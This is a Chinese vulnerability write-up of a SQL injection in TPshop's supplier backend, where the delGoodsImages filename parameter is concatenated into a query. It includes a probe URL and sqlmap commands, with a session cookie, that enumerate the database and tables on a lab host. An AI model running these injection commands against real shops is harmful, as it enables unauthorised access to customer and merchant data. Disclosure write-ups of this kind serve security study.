某Shop供应商后台SQL Injection(二)

2019-11-08 约 86 字 预计阅读 1 分钟

声明:本文 【某Shop供应商后台SQL Injection(二)】 由作者 Onlywait 于 2019-11-08 09:22:53 首发 先知社区 曾经 浏览数 74 次

感谢 Onlywait 的辛苦付出!

0x01 前言

TPshop开源商城系统( Thinkphp shop的简称 ),是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Adroid客户端+微商城,系统PC+后台是基于ThinkPHP MVC构架开发的跨平台开源软件,设计得非常灵活,具有模块化架构体系和丰富的功能,易于与第三方应用系统无缝集成,在设计上,包含相当全面,以模块化架构体系,让应用组合变得相当灵活,功能也相当丰富。

0x02 代码分析

跟踪到**/Application/supplier/Controller/Goods.php**中的**delGoodsImages**方法

  • 47 Line: 从外部获取参数为filename的值赋给$path
  • 48 Line: 将$path拼接到where语句中,然后带入查询
    ###0x03 漏洞探测
    http://172.16.209.129:8084/index.php/Supplier/goods/delGoodsImages/filename/1'

    ###0x04 漏洞复现
    sqlmap -u "http://172.16.209.129:8084/index.php/Supplier/goods/delGoodsImages/filename/1*" --cookie "PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735 " --random-agent --batch --dbms "mysql"
    sqlmap -u "http://172.16.209.129:8084/index.php/Supplier/goods/delGoodsImages/filename/1*" --cookie "PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735 " --random-agent --batch --dbms "mysql" --current-db
    sqlmap -u "http://172.16.209.129:8084/index.php/Supplier/goods/delGoodsImages/filename/1*" --cookie "PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735 " --random-agent --batch --dbms "mysql" -D tpshop3.0 --tables

    ###0x05 漏洞修复

    慎用delete注入

关键词:[‘安全技术’, ‘漏洞分析’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now